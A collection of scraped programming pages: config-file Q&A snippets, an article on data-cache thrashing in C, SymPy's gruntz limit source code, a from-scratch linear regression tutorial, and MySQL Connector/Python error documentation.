has the attributes errno, msg and sqlstate which can be used in your code. 
The following example shows how to handle errors when dropping a table which does not exist (when the DROP TABLE statement does not include a IF EXISTS clause): import mysql.connector from mysql.connector import errorcode cnx = mysql.connector.connect(user='scott', database='test') cursor = cnx.cursor() try: cursor.execute("DROP TABLE spam") except mysql.connector.Error as err: if err.errno == errorcode.ER_BAD_TABLE_ERROR: print("Creating table spam") else: raise Prior to Connector/Python 1.1.1, the original message passed to errors.Error() is not saved in such a way that it could be retrieved. Instead, the Error.msg attribute was formatted with the error number and SQLSTATE value. As of 1.1.1, errors.Error is a subclass of the Python StandardError.
http://dev.mysql.com/doc/connector-python/en/connector-python-api-errors-error.html
Eclipse Community Forums

OneToMany list contains null entries when using OrderBy and shared cache
Christoph John, 2011-03-24T08:55:31-00:00

Hi, we have a problem in our software when using EclipseLink with a OneToMany relationship. A colleague of mine already posted to the Glassfish forum some time ago: lipselink-onetomany-list-contains-null-entries

Quote:

@Entity
public class A {
    @OneToMany(

Chris

Re: OneToMany list contains null entries when using OrderBy and shared cache
Chris Delahunt, 2011-03-24T13:58:03-00:00

That reference is out of context, and is not a warning that @OrderBy does not work. It is a warning that the objects read in might come from the cache, while the @OrderBy only applies when the collection is read in from the database, essentially stating that the JPA provider does not maintain the list order for you. So if you make changes to the list, the next time you read the owner, you may see the list in the same order as you left it in, depending on whether the object was in the cache or had to be built/refreshed from the database since your changes were made. There was a problem with nulls, but it was a specific situation involving attribute change tracking and merging that does not seem to be occurring here. As your attempt to reproduce shows, it is not a common situation, or one that we have seen before (that I am aware of), and is likely a product of a specific set of conditions in your application. As the last issue I was aware of dealt with change tracking, I figure that is a good place to start in isolating the issue, though it is difficult to guess.

Best Regards, Chris
http://www.eclipse.org/forums/feed.php?mode=m&th=206526&basic=1
Journal ynotds's Journal: Don't ever call submit submit

This really should have been a headline item in HTML 101, but it is surprisingly difficult to find a quick explanation of the non-obvious diagnostics which eventually led me to a relatively simple problem.

When there is a namespace clash in JavaScript, properties outrank methods. When you give a submit button a name, that name becomes a property of the containing form, so a button named submit shadows the form's own method. Assuming the containing form tag says name='myformname', the very useful document.myformname.submit() method becomes unreachable.

And the obvious answer, changing the button name, becomes impossible to contemplate when your main client's business-defining intranet is built on middleware which calls every submit button submit so that progress through a process is represented by values of $in{'submit'}. I've even relatively recently added code which logs $in{'submit'} along with other details of every process that is run so we can learn more about actual usage patterns.
https://slashdot.org/~ynotds/journal/188393
I ran into an interesting (well, it’s all relative) content deployment issue the other day, which I’m pretty sure will apply to both SharePoint 2007 and SharePoint 2010. In preparation for some SharePoint training I was delivering at my current client, I wanted to move some real data from production into the training environment to make the training more realistic. To do this, I used my Content Deployment Wizard tool, which uses SharePoint’s Content Deployment API to export content into a .cmp file. (Quick background – the tool does exactly the same thing as ‘STSADM –o export’ and out-of-the-box content deployment, but allows more control. A .cmp file is actually just a renamed cab file i.e. a compressed collection of files, similar to a .wsp). However, when importing the .cmp file containing my sites/documents etc., the operation failed with the following error: The element 'FieldTemplate' in namespace 'urn:deployment-manifest-schema' has invalid child element 'Field' in namespace ''. List of possible elements expected: 'Field' in namespace 'urn:deployment-manifest-schema'. So clearly we have a problem with a field somewhere, and it’s an issue I was vaguely aware of – cross-web lookup fields deployed with a Feature break content deployment. Michael Nemtsev discusses the issue here, saying “There are several samples how to deploy lookup fields via feature () but all of them are not suitable for the Content Deployment Jobs. Because you will get the exception...” Oops that’s a link to an old article of mine. So effectively *my* code to create lookup fields doesn’t work with *my* content deployment tool – don’t you just love it when that happens?! However, I actually have a clear conscience because I know both utilities are doing valid things using only supported SharePoint APIs – this is simply one of those unfortunate SharePoint things. As Michael says, all of the cross-web lookup field samples would have this issue. So what can we do about it? 
For fields yet to be created

In this scenario my recommendation would be to use the technique Michael suggests in his post, which is to strip out the extraneous namespace at the end of our code which creates the lookup.

For fields which are already in use (i.e. the problem I ran into)

If your lookup fields have already been deployed, then you have 2 options:

- develop and test a script to retrospectively find and fix the issue across your web/site collection/farm/whatever scope you need
- fix the issue in the .cmp file you were trying to import in the first place, so this particular import will succeed

Clearly your decision might depend on how much content deployment you want to do to the site/web/document library or list which has the problem. If you're anticipating doing it all the time, you should fix the underlying issue. If, as in my scenario, you just need to get an ad-hoc import to succeed, here's how.

Hacking the .cmp file

The process is effectively to fix up the .cmp file, then rebuild it with the updated files. I noticed an unanswered question on Stack Overflow about this process, so clearly it's something that can occasionally arise. Of course, even in these WSPBuilder/SP2010 tools days, all SharePoint devs should know you can use makecab.exe with a .ddf file to build a cab file - but what happens when you have hundreds of files? That's hundreds of lines you'll need in your .ddf file. Certainly you could write some code to generate it for you, but chances are you're looking for a quick solution. The first process I came up with was:

- Rename .cmp file to .cab, extract files to other directory.
- Fix up files (more detail shortly).
- Use WSPBuilder to generate the .ddf file from files on filesystem - edit this to ensure paths are correct.
- Use makecab.exe + the generated .ddf file to build the .cab file.
- Rename extension to .cmp.
However, a slightly better way is to use Cab File Maker, like this:

- Rename .cmp file to .cab, extract files to other directory.
- Fix up files - to do this, edit manifest.xml and remove all instances of the following string: "xmlns="
- Open Cab File Maker 2.0, drag files in and set options for where to generate the ddf file and cmp file, like so:
- Voila - your cmp file is now ready to go and should import successfully.
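For reference, the directive file that gets generated behind the scenes looks roughly like this; the file list below is a placeholder, not the real manifest of any particular export (a real .cmp contains manifest.xml plus the other export XML files and the .dat content files extracted in step 1):

```
; rebuild.ddf - hypothetical makecab directive file
; run with:  makecab /F rebuild.ddf
.Set CabinetNameTemplate=import.cmp
.Set DiskDirectory1=.
.Set Cabinet=on
.Set Compress=on
manifest.xml
Requirements.xml
ExportSettings.xml
00000000-0000-0000-0000-000000000000.dat
```

Each plain line names one file to pack, which is exactly why hand-writing the .ddf gets painful once the export contains hundreds of files.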
https://www.sharepointnutsandbolts.com/2010/01/editing-cmp-files-to-fix-lookup-field.html
mallinfo()

Get memory allocation information

Synopsis:

#include <malloc.h>

struct mallinfo mallinfo( void );

Since: BlackBerry 10.0.0

Library: libc

Use the -l c option to qcc to link against this library. This library is usually included automatically.

Description:

The mallinfo() function returns memory-allocation information in the form of a struct mallinfo:

struct mallinfo {
    int arena;    /* size of the arena */
    int ordblks;  /* number of big blocks in use */
    int smblks;   /* number of small blocks in use */
    int hblks;    /* number of header blocks in use */
    int hblkhd;   /* space in header block headers */
    int usmblks;  /* space in small blocks in use */
    int fsmblks;  /* memory in free small blocks */
    int uordblks; /* space in big blocks in use */
    int fordblks; /* memory in free big blocks */
    int keepcost; /* penalty if M_KEEP is used -- not used */
};

Returns:

A struct mallinfo.

Classification:

Last modified: 2014-06-24
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/m/mallinfo.html
Created on 2009-04-03 01:24 by nneonneo, last changed 2010-02-05 17:13 by pitrou. This issue is now closed.

Related reproduction:

f = open('test', 'w+b')
f.write('123456789ABCDEF')
#f.seek(0)
print "position", f.tell()
print '[', len(f.read()), ']'
f.close()

On Windows (2.6.2 mingw / 2.6.4 msvc builds), len(f.read()) > 0 (4081 when I did the test) but it should be 0, and printing the buffer shows binary garbage. Linux is OK: f.read() returns '' as expected.
To avoid interfering with EAGAIN special cases, this would be needed: #if defined(EBADF) #define ERRNO_EBADF(x) ((x) == EBADF) #else #define ERRNO_EBADF(x) 0 #endif Then, additional checks would need to be added to get_line, getline_via_fgets and a couple of other places. I think the right thing is to add a field f_modeflags to the file object, to be initialized on creation. Or use f->readable, f->writable like py3k. Thoughts? I think checking errno would be fine (provided it eliminates all variations ot this bug).. Ok, then perhaps it's better to have some internal {readable, writable} flags based on the original mode string. The new patch takes over the logic from fileio.c. Tested on Linux, Windows x86/x64 and OpenSolaris. Hmm, test_file.py is for the new IO library (backported from 3.x). You should use test_file2k.py for tests against the 2.x file object. Also, readinto() should take something such as a bytearray() as argument, not a string. Thanks Antoine, I fixed both issues. Oh and the following line shouldn't be needed: data = b'xxx' if 'b' in mode else u'xxx' Since old-style file objects always take bytestrings (it's harmless, though, because the unicode string will be implicitly converted). Ok, I'll fix that. Perhaps I should also remove the comment in err_mode(). I wonder if the ValueError in fileio.c is intentional: >>> import io >>> f = io.open("testfile", "w") >>> f.write("xxx") 3 >>> f.read() Traceback (most recent call last): File "<stdin>", line 1, in <module> IOError: not readable >>> >>> f = io.FileIO("testfile", "w") >>> f.write("xxx") 3 >>> f.read() Traceback (most recent call last): File "<stdin>", line 1, in <module> ValueError: File not open for reading > I wonder if the ValueError in fileio.c is intentional: I don't know, but this would be the subject of a separate issue anyway. The patch was committed in r77989 (trunk) and r77990 (2.6). Thank you Stefan!
http://bugs.python.org/issue5677
CC-MAIN-2017-09
refinedweb
675
76.93
According to Spotlight requirements:

Note: Spotlight will run on 64-bit versions of the client operating system with the use of a 32-bit Oracle client.

If you have a 64-bit server and a 32-bit client installed on the same computer, it's possible that Spotlight looks for oci.dll in the wrong Oracle Home. Examine the order of Oracle home directories from Universal Installer and place the 32-bit home first:

- Run Oracle Universal Installer
- Click "Installed Products" button
- Switch to "Environment" tab
- Reorder Oracle Homes with the arrows on the right side and click "Apply"

Reasoning over lots of facts and triggering actions when a set of facts matches specific conditions is a good match for Drools. You could represent every action/decision that the player has made as a fact, which you could insert into a Drools knowledge session. In that session you could store all of your "triggers" as Drools rules, which will fire when a collection of facts in memory matches the condition. Drools supports dynamic addition/removal/editing of rules and is explicitly targeted at allowing non-developers to write logic using a simpler rule language. The specific part of Drools to start with is the core - Drools Expert.

Row: (index - 1) div nrOfColumns + 1
Column: (index - 1) mod nrOfColumns + 1

Your examples:
(5-1) div 3 + 1 = 2, (5-1) mod 3 + 1 = 2 --> (2, 2)
(8-1) div 3 + 1 = 3, (8-1) mod 3 + 1 = 2 --> (3, 2)

Forgot about this question from a long time ago, but it turns out MediaWiki has a built-in function for this:

$myNamespace = $article->getTitle()->getNamespace();

Since the article object is by default passed to an extension hooked to an on_save process, this will get the namespace as a numeric value.

How about capturing the text being input on the cell's key press event, checking if the text matches with custom functions, and if it matches, showing something like a label or shape to pretend to be a tooltip? Is this acceptable? It is a little ugly but easier.
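The row/column div-and-mod arithmetic in the answer above can be sanity-checked in a few lines (the helper name here is made up for the demo):

```python
# Map a 1-based linear index to (row, column) in a grid with n_cols columns.
def row_col(index, n_cols):
    row = (index - 1) // n_cols + 1   # "div" in the answer
    col = (index - 1) % n_cols + 1    # "mod" in the answer
    return row, col

print(row_col(5, 3))  # (2, 2)
print(row_col(8, 3))  # (3, 2)
```

Subtracting 1 before dividing is what makes the formulas work for 1-based indices; for 0-based indices you would just use divmod(index, n_cols).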
A simple on-screen answer using Write-Host:

$userGroups | %{Write-Host "Removing user from group $_"; get-adgroup $_ | Remove-ADGroupMember -confirm:$false -member $SAMAccountName}

By default ASP.NET pages already have a <form> tag that wraps the entire page. So if you add a further <form> tag you end up with nested forms, which isn't allowed. You can usually get away with dropping your inner <form> tag.

Try using the entity code described at HTML Codes - Characters and symbols. For ' the symbol is &#39;

Also see IMPLEMENTING TOOLTIPS FOR MICROSOFT DYNAMICS CRM 2011, which verifies this approach.

To prevent the groupbox from disappearing, just set its Constraints.MinHeight to the same value as the splitter MinSize. The splitter will snap the fixed control (groupbox) to its MinHeight value when the Height is below the MinSize.

How about using the $el and adding it there?

form.$el.attr("class", "testing");

I finally found the solution: for Ext 4.0, you need to set the contentType of the response to something like "html/text", and then surround the JSON string with tags. Take a look at this for further information.

You should do this in your model by adding your substring before the value the form will send you. This seems to be business logic; it shouldn't be in the view.

def post_tickets(params)
  client.username = "Hello From, " + client.username
  client.post_tickets(params)
end
using (SqlConnection myDatabaseConnection = new SqlConnection(myConnectionString.ConnectionString)) { myDatabaseConnection.Open(); using (SqlCommand SqlCommand = new SqlCommand("Select LastName from Student", myDatabaseConnection)) using (SqlDataAdapter da = new SqlDataAdapter(SqlCommand)) { int i = 0; SqlDataReader DR1 = SqlCommand.ExecuteReader(); while (DR1.Read()) { i++; UserControl2 userconrol = new UserControl2(); userconrol.Tag = i; userconrol.LastName = (string)DR1["LastNa']; The problem was the selector $('#input2' + num2) when the script is executed first, there is only one element with id input2, but your selector is looking for an element with id input21 which does not exits. I fixed it by cloning the last element with class clonedInput2 instead of finding the element with id jQuery(function($) { $('#btnAdd2').click(function () { var num2 = $('.clonedInput2').length; // how many "duplicatable" input fields we currently have var newNum = num2 + 1; // the numeric ID of the new input field being added // create the new element via clone(), and manipulate it's ID using newNum value var newElem2 = $('.clonedInput2:last').clone().attr('id', 'input2' + newNum); // manipulate the name/id values of the input inside)
http://www.w3hello.com/questions/-Quest-Adding-a-new-Web-Form-to-ASP-NET-app-
CC-MAIN-2018-17
refinedweb
788
55.84
In my work, I have observed that data access is one of the more complex and error-prone elements of many business computer systems. Developers always seemed to fight with the persistence mechanism and the related problems it caused for deployment, upgrades/changes, integration, reporting, and other important aspects of a complete enterprise line-of-business application.

When I moved to .NET and started leveraging its OO capabilities, it seemed data access became even more complex. I found that I frequently had to compromise either OO principles or data access principles, and it never seemed to work out as well as I had hoped. As I started trying to solve more complicated challenges like reporting, integration with other systems, schema migration from one version to the next, and other enterprise concerns, it only got worse and more complex.

As time went on, I spent more time researching the problem and became aware of a new type of solution. The theory is that, in object-oriented systems, there is a fundamental mismatch between the inherent capabilities, strengths, and weaknesses of object-oriented design and those of a relational data structure design. Many of the problems and resultant defects commonly observed in the persistence layer of an application, the theory suggests, trace back to this inherent mismatch. The theory calls this mismatch the "impedance mismatch." Keeping this in mind, an application architect who operates under this theory should aim to reduce complexity by avoiding this mismatch.

Primary Source of Complexity: The Problem Domain

All applications exist to solve one or more problems. The "problem domain" (or "domain" for short) is the set of problems that the application attempts to solve. The domain is where the primary complexity lies and will draw the most attention from programmers, designers, and architects.
Statements such as "Inactive employees should not be scheduled for work items" usually express these domain problems. Since I like to use object-oriented systems such as .NET, I would likely start out trying to model this problem using an "Employee" object and a "Work Item" object. I might have an "Active" Boolean property on Employee as well as a method called "ScheduleWorkItem" that would attempt to schedule a work item for that employee and report problems if any exist. This is a contrived example, of course, but you will hopefully get the general idea.

I have found that object-oriented design gives me the right balance of rigidity and flexibility necessary to address most of the complexity I run into in most line-of-business problem domains. I like to call objects like "Employee" and "Work Item" entities. Entity is one of those terribly overloaded words with conflicting definitions depending on the context. To me, in the context of domain modeling, entity has a specific definition: a single, uniquely identified unit which represents a set of related data and behavior that is different from other single, uniquely identified units of data and behavior.

Entities are very important in my systems. Their identifier never changes, but their data and behavior may, according to the rules of the problem domain. Finally, I find that languages like C#, VB, and others, as well as the capabilities of the .NET Framework, afford me better options for making decisions to solve domain problems and to craft and design my entities within that domain.

Secondary Source of Complexity: Persistence

Another source of complexity in my applications is the persistence and retrieval of entity data. Today, there are many options for the underlying data persistence store, from object-oriented databases (OODB), file-based stores, and cloud stores to the most prevalent: the relational database management system (RDBMS).
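The Employee/Work Item idea above can be sketched in C#. Every name and rule here is invented purely for illustration; none of it comes from AdventureWorks LT or any real schema:

```csharp
// Hypothetical domain entities illustrating the "Inactive employees
// should not be scheduled" rule. All names are made up for this example.
public class WorkItem
{
    public virtual int WorkItemID { get; set; }
    public virtual string Description { get; set; }
    public virtual Employee AssignedTo { get; set; }
}

public class Employee
{
    public virtual int EmployeeID { get; set; }
    public virtual bool Active { get; set; }

    // The domain rule lives on the entity itself, not in the UI
    // and not in a stored procedure.
    public virtual void ScheduleWorkItem(WorkItem item)
    {
        if (!Active)
            throw new InvalidOperationException(
                "Inactive employees cannot be scheduled for work items.");
        item.AssignedTo = this;
    }
}
```

The point of the sketch is only that the scheduling decision flows from the domain object; callers ask the entity rather than re-implementing the rule elsewhere.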
Currently, I still prefer using RDBMSs such as Microsoft SQL Server as the underlying persistence store. RDBMSs are, as the 'R' implies, relational data stores. This means that the theory of impedance mismatch is in play and is a problem I must address.

When architecting a system, I have several principles I use to guide me when choosing a solution to mitigate the impedance mismatch problem. They are not absolute rules, though, and I sometimes do violate them if I have very good justification. Principles are, after all, meant to guide, not to dictate. My principles of persistence are:

- Persistence ignorance: Since the domain is usually complex enough, I do not need the extra complexity of persistence-related concerns bleeding into my domain entity logic. I keep persistence concerns, to the maximum extent possible, in the persistence layer. It never works out 100%, but the few compromises I must make are tolerable.
- Domain concerns are the concern of the domain: It's hard enough keeping the domain consistent and defect-free without allowing domain concerns, business logic, and other such concepts to escape from the domain and appear in other areas of the application such as the presentation layer, the database (SQL stored procedures), or ad-hoc queries with logic embedded in WHERE clauses. Decisions that are the concern of the domain should flow from the domain out into other parts of the system, and those parts should respect the domain's authority to determine how those decisions are made.
- Reporting, data integration, and schema versioning are separate problem domains: This is perhaps one of the easiest principles to fail to adhere to. It's easy to allow complex query specifications (that is, reports) to creep into the domain. When I use the word "report," I don't just mean "ad-hoc reports" (think Crystal Reports, SQL Server Reporting Services, and similar products).
I mean anything that involves submitting a query for data using more than a few simple criteria, possibly criteria specified by the user. In many cases, I will consider handling these types of queries/reports in a view, stored procedure, or some other facility of the database designed for the given type of situation. I take great care, though, before putting anything that will likely see frequent change into the database, as it is usually more difficult to handle change management, versioning, and other such concerns there. I realize that I have to balance the needs of the application against business demands for frequent change and rapid deployment while maintaining high quality. These aspects can be at odds and require a high degree of discipline and consideration.

For most situations, database persistence and querying is a repetitive, consistent, and well-known problem space. However, in many projects today, developers are writing data access code from scratch or rewriting it from a previous attempt on a previous project. In the .NET space, there are many tools that aid with the problems involved in ADO.NET data access. From my experience, these are mostly solved problems, and it is, frankly, wasteful to write simple CRUD data access directly against ADO.NET today when these tools make it easier, safer, and better performing than the average developer could accomplish in a reasonable period of time writing a custom persistence framework. One genre of these tools stands out especially: object/relational mapping frameworks. In the next section, I will explain object/relational mapping (O/RM) and how O/RM tools can greatly accelerate your product development and reduce defects and complexity in your domain and applications.

Object/Relational Mapping

The several currently available object/relational mapping frameworks (heretofore O/RMs) for .NET take several different forms and have different strengths and weaknesses because of this.
I won't go into a full analysis and comparison because it is out of the scope of this article. There are a few features that I find particularly compelling or even mandatory in an O/RM offering I might consider. Among these are: persistence ignorance, POCO support, transparent lazy loading, and mapping separate from the model.

Persistence Ignorance and POCO Support

I've already mentioned persistence ignorance earlier in this article, so I'll jump right to POCO (Plain Old C#/CLR Object). POCO is important because I want to be able to use my domain entity objects without having to attach to a database. Many persistence frameworks (non-O/RM and some O/RM) in use today require objects to be connected to a database even to call their constructor. To me, this is an unacceptable requirement, as it hampers my ability to use the objects outside of a database persistence context. Unit testing the behavior in my entities would be extremely complicated, if not impossible. POCO also represents the fulfillment of persistence ignorance in that my entities are not required to do or implement much of anything besides some baseline .NET requirements.

Transparent Lazy Loading

Most O/RMs support some form of lazy loading. Lazy loading is the concept where certain properties or related entities for a given entity are not loaded when the entity itself is loaded. Instead, they can be loaded on demand later (triggering another database call). Lazy loading simplifies matters on the "O" side of O/RM in that objects are easily available without a lot of back-and-forth with the persistence framework to retrieve the objects needed when they're needed.

Lazy loading comes in two forms: direct and transparent. Direct means that the programmer must initiate the lazy loading explicitly (by calling a method such as "LazyLoad()" on the "Orders" property of the "Customer" entity, for example).
Transparent means that the programmer can simply start enumerating over the "Orders" collection and the lazy loading will happen automatically, without any separate or additional method calls on the object. Each of these approaches has its pluses and minuses. I have found that, ultimately, transparent lazy loading works best and fits best with my other goal of persistence ignorance. If I have to call things like "LazyLoad()" on my entities, I have allowed persistence concerns to seep into my domain model. With transparent lazy loading, I can use my entities the same way in code whether they're being serviced from the database or some other data source.

Of course, this doesn't mean I get to be lazy about lazy loading and ignore the performance cost of a potentially unnecessary extra round trip to the database. I balance this against the need for rapid development. When I know that I will need the extra data no matter what, I can signal this to the persistence framework when I'm querying, instructing it to eager-fetch the data that would otherwise be lazy loaded.

Mapping Separate from the Model

Another aspect of a successful O/RM, for me, is that I am able to map between the object model and the relational model separately from either. That is, the relational model should not need to know nor care about the object model, and vice versa. This means no attributes on my .NET classes, and no .NET type names in the database, for example. Thus the mapping is, in and of itself, a first-class citizen. It will require maintenance along with the code and the database schema. Without the mapping, neither the objects nor the relational model accomplish much of anything. Tooling for the mapping is important to me also: the mapping must be easy to create, edit, and maintain.

Introduction to NHibernate

One O/RM that particularly stands out and meets every single criterion mentioned above to one extent or another is the NHibernate framework.
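As a sketch of the difference, consider a hypothetical mapped Customer with an Orders collection (these names and the mapping behind them are assumed for illustration; the eager case uses NHibernate's criteria API, which ships SetFetchMode in the 2.0 line):

```csharp
using NHibernate;
using NHibernate.Criterion;

// Transparent lazy loading: enumerating Orders triggers the second
// query behind the scenes; no explicit LazyLoad() call anywhere.
var customer = session.Get<Customer>(customerId);
foreach (var order in customer.Orders)   // the orders query runs here
    Console.WriteLine(order.OrderDate);

// Eager fetching: tell NHibernate up front to pull the Orders in
// with the Customer so only one round trip is made.
var loaded = session.CreateCriteria(typeof(Customer))
    .Add(Restrictions.IdEq(customerId))
    .SetFetchMode("Orders", FetchMode.Eager)
    .UniqueResult<Customer>();
```

The calling code is identical either way once the object is in hand, which is exactly what persistence ignorance is after; only the fetching strategy changes.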
NHibernate is a .NET project based heavily upon the Java-based Hibernate framework. Hibernate 1.0 was released in 2002. The 1.0 release of NHibernate occurred in 2005, though it had been enjoying decent circulation and usage as a point release for some time before then. NHibernate is about four years old at the time of this writing. That reminds me of another aspect of a good O/RM I look for: maturity. Building a good O/RM is non-trivial, so maturity and staying power are preferable features of an O/RM. NHibernate is one of the oldest and most active O/RM frameworks for .NET.

NHibernate leverages ADO.NET under the covers to achieve its data access. This means that it is compatible with various ADO.NET drivers and features. NHibernate composes parameterized statements when interacting with the underlying database connection. NHibernate has a concept of "dialects" and "drivers" for handling the differences and idiosyncrasies of various flavors of SQL (T-SQL and PL/SQL, for example) and database engines (SQL Server, Oracle, MySQL, and Firebird, to name a few). NHibernate supports an extensive list of database engine platforms, versions, and SQL dialects. One benefit of this is that applications written using NHibernate for their data access can, with relative ease, support multiple database platforms with far fewer changes and reduced testing complexity. In most cases, the difference between supporting Microsoft SQL Server 2005 and Oracle 9i is a single-line change in a configuration file.

NHibernate uses a simple XML configuration file to specify the dialect, driver, connection string, and various other operational options. You can also configure it programmatically using your own configuration mechanism if you prefer not to use XML or have some other requirement for how you configure your applications. Typically, you specify the object/relational mappings through XML, though there are several other options.
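For instance, switching the target database usually comes down to changing the dialect (plus, as needed, the driver and connection string) in the configuration file. The class names below are illustrative; dialect names vary between NHibernate releases, so check the NHibernate.Dialect namespace of your version:

```xml
<!-- Targeting SQL Server 2005 -->
<property name="dialect">NHibernate.Dialect.MsSql2005Dialect</property>

<!-- Targeting Oracle 9i: same application code, different dialect line
     (exact class name may differ by NHibernate version) -->
<property name="dialect">NHibernate.Dialect.Oracle9Dialect</property>
```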
Called Hibernate Mapping XML files, or "HBM XML" for short, these XML files can be loaded from disk, embedded as a resource in an assembly, or loaded via some other means and passed as an XmlDocument to NHibernate's configuration API directly.

Finally, after you've configured NHibernate at startup, you create a "SessionFactory" (once per application) and use this factory to create "sessions" through which all the important and interesting data access work happens. The SessionFactory is thread-safe, so you can call it from multiple threads or ASP.NET requests safely.

The NHibernate ISession object is perhaps the most visible part of NHibernate and the piece of the framework with which you will have the most interaction. Logically speaking, the ISession represents an active connection and transaction to the database (though do not directly equate those things, as the ISession may manage connections and transactions differently under the covers depending on various factors). A given ISession instance also holds a first-level cache of objects it has recently retrieved from or saved to the database, which prevents doing extra work or having duplicate objects floating around within a particular session. The ISession instance is also the gateway to performing CRUD operations, among other things. I'll get into the specifics later in this article.

Getting Started with NHibernate

At the time of this writing, NHibernate's current released version is 2.0.1. NHibernate 2.1 is under active development and has some exciting new features. For now, though, I'll concentrate on 2.0.1, which has more than enough features to fill this article and then some.

Downloading NHibernate 2.0.1

NHibernate is an open source project managed along with the Hibernate project (among others).
You can get the installation package as well as documentation and links to support and guidance via the Hibernate.org Web site. Before I proceed, I should also mention the growing NHibernate community and suite of contributory/add-on projects. You can learn more about NHibernate, view documentation, and browse related projects at NHForge.

Click the download link, which should take you to the SourceForge download page. Continue clicking the download links until you have a choice between a "bin" and a "src" variant of the NHibernate ZIP file. Download the "bin" variant and unzip it to a folder on your hard drive.

Also inside the ZIP file are two XSD (XML Schema Definition) files. These files enable Visual Studio to give you IntelliSense and validation as you author NHibernate XML configuration and entity mapping documents. Copy these files to your Visual Studio installation's XML schema directory. For Visual Studio 2008, this is usually "C:\Program Files\Microsoft Visual Studio 9.0\Xml\Schemas." If you have a 64-bit version of Windows, it will be under "Program Files (x86)." Once you copy the XSD files to this folder, Visual Studio will detect when you start authoring NHibernate XML documents and provide assistance.

Setting Up a Project to Use NHibernate

Once you have obtained all the binaries, create a new solution in Visual Studio and add two new projects: a class library project and a console application project. Add a reference from the console project to the class library project. In the console application project, add a reference to NHibernate.dll from the folder in which you unzipped the NHibernate binaries. I chose a console application because it is the easiest path to get started and involves the least amount of code. Unfortunately a console application is not that useful by itself, so it won't help you much in your real work.
However, I think it will get the concepts across faster by not having to mess with other concerns such as Windows Forms or Web requirements.

The next step to getting started with NHibernate is to begin mapping your objects to the database schema. This step is necessary to fulfill the "mapping separate from the model" feature I talked about earlier. NHibernate allows for mapping of many sophisticated situations from both the object and database schema perspectives. Before I proceed, however, I think it is important to stop and talk a little about the domain. Then I'll resume with how to create the domain mappings and, finally, how to bootstrap NHibernate and begin using it.

The Domain: AdventureWorks LT

The diagram in Figure 1 illustrates the portion of the AdventureWorks LT relational model that I'll map in this article. The center of the model is the Customer table. Customers have Addresses and Sales Orders. Each Sales Order has a Header with multiple Detail records. You should note that I italicized and capitalized certain words in that last sentence. This is because those words are important to the domain, as they represent the key entities and describe the relationships between them. In this article, I'll show how to map these entities and their relationships with NHibernate, as well as how to use NHibernate to persist and retrieve them.

Basic Entity Mapping

NHibernate has the ability to map an object to multiple tables, to a view, and to many other combinations. Perhaps the most common type of mapping is simply mapping one object to one table. This is called a "class per table" mapping. The "Address" table in the AdventureWorksLT database is a good place to start, as you can map it using the class-per-table style.

Creating the Entity Object

Let's start by creating an "Address" class in the .NET project.
Create a folder in your project called "Domain" and then add a new class to that folder called "Address." NHibernate can map properties to columns even when their names are different. In this case, however, the Address table has .NET-friendly column names, which keeps things simple. Create properties in your Address class that match the names and types of the columns in the Address table. Mark each property with the "virtual" keyword (or "Overridable" if you're using VB). This may seem odd; I'll explain why later in this article. When you're done, your Address class should look something like:

    public class Address
    {
        public virtual int AddressID { get; set; }
        public virtual string AddressLine1 { get; set; }
        public virtual string AddressLine2 { get; set; }
        public virtual string City { get; set; }
        public virtual string StateProvince { get; set; }
        public virtual string CountryRegion { get; set; }
        public virtual string PostalCode { get; set; }
        public virtual DateTime ModifiedDate { get; set; }
    }

You should note that I did not include a property for the rowguid column in the Address table. This is because rowguid is a special column for SQL Server and should, generally speaking, not be tampered with by client applications. SQL Server uses it for replication and other internal processes and manages the column itself, so you don't need to map it or otherwise be concerned about it.

Creating the NHibernate HBM XML Mapping File

NHibernate's primary mechanism for mapping objects to relational structures is XML. I usually refer to these XML mapping documents as "HBM" or "HBM XML" files. HBM stands for "HiBernate Mapping." NHibernate's configuration can accept XML mapping documents in a number of different forms (a direct XmlDocument object passed in through its configuration API, a reference to a file on disk, an assembly-embedded resource, etc.).
The most common way to pass mappings to NHibernate, however, is to have your XML documents embedded as resources in an assembly. I usually embed the XML documents into the same assembly as the one where my entity objects are located, but that is certainly not a requirement.

For now, let's keep things simple. Make a folder in your project called "Mappings." Create a new XML document file in that folder called "Address.hbm.xml." The name itself is not important, but NHibernate will automatically find all *.hbm.xml embedded resources; if you name your mapping documents differently, you will have to write some extra code to help NHibernate find them. For now, let's stick with the default convention: *.hbm.xml. It's also worth mentioning that I prefer the style of having one HBM XML file for each entity. This is not required, however. You can have one big XML file with all your entity mappings in it, or you can break it up by whichever grouping you prefer.

After you've added the XML file to the project, you need to mark it as an "embedded resource" so the compiler will embed the XML file into the compiled assembly. Select the XML file in Solution Explorer and press F4 to bring up the Properties window. Change the "Build Action" property from "Content" to "Embedded Resource." This is an important step and one that is often forgotten. If you make this common mistake, NHibernate will throw errors and complain that it can't find the mapping for the entity in question. Once you have the first XML file set up correctly, I recommend adding new XML documents by copying and pasting the original. Visual Studio will also copy properties like "Build Action," ensuring that you never accidentally forget to change it and saving yourself a lot of headaches.

Every HBM XML document starts with the "hibernate-mapping" element. To map a class to a table you use the "class" element.
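Embedded *.hbm.xml resources get picked up when the configuration is pointed at the assembly that contains them. A minimal bootstrap sketch, assuming the Address entity lives in the class library assembly, looks like this:

```csharp
using NHibernate.Cfg;

var cfg = new Configuration();
cfg.Configure();  // reads hibernate.cfg.xml from the output folder

// Scans the given assembly for embedded *.hbm.xml resources and
// adds each one as a mapping.
cfg.AddAssembly(typeof(Address).Assembly);

var sessionFactory = cfg.BuildSessionFactory();
```

BuildSessionFactory() is the expensive, once-per-application step; the Configuration object itself can be discarded afterward.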
Both the hibernate-mapping and class elements take a number of attributes/options, some of which I'll get to later, but for now I'll stick to the basics. If your database engine supports the concept of multiple schemas in a single catalog (for example, SQL Server 2005's "schema" concept), then you will need to tell NHibernate this in your mapping. In the LT example, the Address table is in the "SalesLT" schema, so add the "schema" attribute, with value "SalesLT", to the <hibernate-mapping> element. The basic shell of your mapping between the Address class and table should now look something like this:

    <?xml version="1.0" encoding="utf-8" ?>
    <hibernate-mapping xmlns="urn:nhibernate-mapping-2.2"
                       schema="SalesLT">
      <class name="Address">
      </class>
    </hibernate-mapping>

Mapping the ID of the Entity

